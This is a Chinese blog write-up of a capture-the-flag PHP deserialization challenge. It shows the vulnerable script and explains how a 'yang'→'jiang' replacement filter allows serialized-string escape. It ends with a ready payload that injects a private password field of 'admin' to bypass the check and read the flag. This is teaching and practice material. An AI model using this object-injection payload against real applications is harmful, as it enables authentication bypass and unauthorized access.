cs反序列化2

最新推荐文章于 2022-04-08 21:45:00 发布
最新推荐文章于 2022-04-08 21:45:00 发布
阅读量127 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113353316
版权

cs反序列化2

http://111.229.84.70:9998/

<?php
highlight_file(__FILE__);
class HZNU{
    private $username;
    private $password;
    
    public function __construct($user,$pass){
        $this->username=$user;
        $this->password=$pass;
    }
    
    public function login(){
        if ($this->password==='admin'){
            include 'flag.php';
            echo $flag;
        }
    }
}
function filter($str){
    return str_replace('yang','jiang',$str);//当正则到yang时长度加一
}
$username=$_GET['user'];
$password=$_GET['pass'];
if(preg_match('/admin/',$password)){
    die('你在想屁吃');
}
$a=new HZNU($username,$password);
$s=filter(serialize($a));//序列化a再正则替换
$b=unserialize($s);//再反序列化
$b->login();
?>

get:user和pass两个值,pass不为admin,处理后pass=admin,那么构建反序列化逃逸

private属性序列化之后是这个样子(%00算一个长度)

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:3:"xxx";s:14:"%00HZNU%00password";s:5:"admin";}

要把后面37个字符挤出去,就需要37个yang

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:173:"yangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyang";s:14:"%00HZNU%00password";s:5:"admin";}";}

正则替换之后

O:4:"HZNU":2:{s:14:"%00HZNU%00username";s:173:"jiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiangjiang";s:14:"%00HZNU%00password";s:5:"admin";}";}

这样就以假乱真了,所以payload

?user=yangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyangyang";s:14:"%00HZNU%00password";s:5:"admin";}&pass=666

在这里插入图片描述

切谁怕谁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
05-09
c# CS登录实现(序列化反序列化)LoginProcessVersion1.0
C# 序列化-反序列化.cs
09-06
C# 序列化-反序列化.cs
cs反序列化4
missht0的博客
01-29 329
cs反序列化4 <?php highlight_file(__FILE__); error_reporting(0); class test{ public $peguin; public $source; public function __construct($file){ $this->source = $file; echo 'welcome to '.$this->source."<br>"; }
来自CS的序列化的类
weixin_30244681的博客
04-30 73
来自CS的序列化的类 usingSystem;usingSystem.Collections.Specialized;usingSystem.Globalization;usingSystem.IO;usingSystem.Runtime.Serialization;usingSystem.Runtime.Serialization...
【Java框架】CSFreamwork:参数序列化
YunSu_CJ的博客
12-27 362
客户端请求资源,如何发送参数? 数据发送,可以是字符串或者字节数据,那么如何发送整型、浮点型、对象等数据。有一种方式是将数据格式化,转换成字符串或字节类型发送,对端接收后,将其还原成源数据。 什么是序列化? 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。 Gson工具 Gson 是 Google 提供的用来在 Java 对象和 JSON 数据之间进行映射的 Java 类库。可以将一个 JSON 字符串转成一个 Java 对象。 ArgumentMaker 小工具
C# 三种序列化
小小的花园里面挖呀挖呀~
08-25 671
Binary 引用 using System.Runtime.Serialization.Formatters.Binary; \\User.cs [Serializable] public class User { public string UserName { get; set; } public string Password {
CTFshow-WEB入门-反序列化
feng的博客
02-14 5488
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
C# Xml序列化和反序列化Dictionary
闪耀星星的窝
04-08 1437
做奇门对接时,extendProp字段是一个Map类型 C# 序列化xml时字典类型不支持 ExtendProp.cs using System; using System.Collections.Generic; using System.Xml; using System.Xml.Schema; using System.Xml.Serialization; namespace Qimen.Api { public class ExtendProp : Dictionary<st
ctfshow 反序列化
..
03-07 3252
web254 读代码后发现题目要求传入的值等于类里面的值 ?username=xxxxxx&password=xxxxxx web255 这里的话得有点改变,得让$this->返回的值为true,所以得构造一下链子如下 <?php class ctfShowUser{ public $isVip; public function __construct(){ $this->isVip=true; } } $a=new ctfShowUser()...
使用json-lib完成json的序列化和反序列化.docx
07-05
2. JSON反序列化(JSON转对象) 反序列化则是将JSON字符串转换回Java对象的过程。json-lib提供了`JSONObject.toBean()`方法将`JSONObject`转换为Java对象,或者`JSONArray.toList()`方法将`JSONArray`转换为Java集合...
使用json-lib完成json的序列化和反序列化.pdf
07-05
Java中的json-lib库是一个处理JSON的工具包,它提供了JSON与Java对象之间的序列化和反序列化功能。本文将深入探讨如何使用json-lib进行这些操作。 首先,我们来看如何将JSON字符串序列化成Java对象。在Java中,对象...
Json格式序列化和反序列化处理
03-31
涵盖了几种json转化的方法
cs反序列化1
missht0的博客
01-28 96
cs反序列化1 http://111.229.84.70:9997/ 参考:https://www.cnblogs.com/Jim2g/articles/13641685.html llinux命令:https://wenwen.sogou.com/z/q797390881.htm?rcer=g9PEmO6OUhz-HfDog <?php error_reporting(0); highlight_file(__FILE__); class Person{ public $username='
Java项目-基于Springboot+Vue的会员制医疗预约系统设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件
06-19
【基于Springboot+Vue的会员制医疗预约服务管理信息系统的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于Springboot+Vue的会员制医疗预约服务管理信息系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行! 项目详情: https://blog.csdn.net/u011832806/article/details/138750441
protobuf-3.19.3-cp38-cp38-manylinux2014_aarch64.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
HiMall2.6多用户B2B2C商城源码.zip
06-19
生态级B2B2C盈利模式商业平台。完备的电商功能,为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速,便捷的功能扩展及可以进行二次开发的商城源码,为企业电商业务长线快速发展提供了强有力的保障。 适用企业:各类百货MALL、行业实体市场、电商产业园、行业协会、行业门户网站等。
protobuf-3.19.3-cp310-cp310-win_amd64.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
protobuf-3.11.2-cp37-cp37m-win32.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
protobuf-3.17.0-cp36-cp36m-win_amd64.whl
最新发布
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
c# protobuf序列化
09-07
6. 如果要将字节数组反序列化回消息对象,可以使用解析器类: ```csharp Person deserializedPerson = Person.Parser.ParseFrom(data); ``` 现在,您可以使用deserializedPerson对象访问反序列化后的数据。 这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值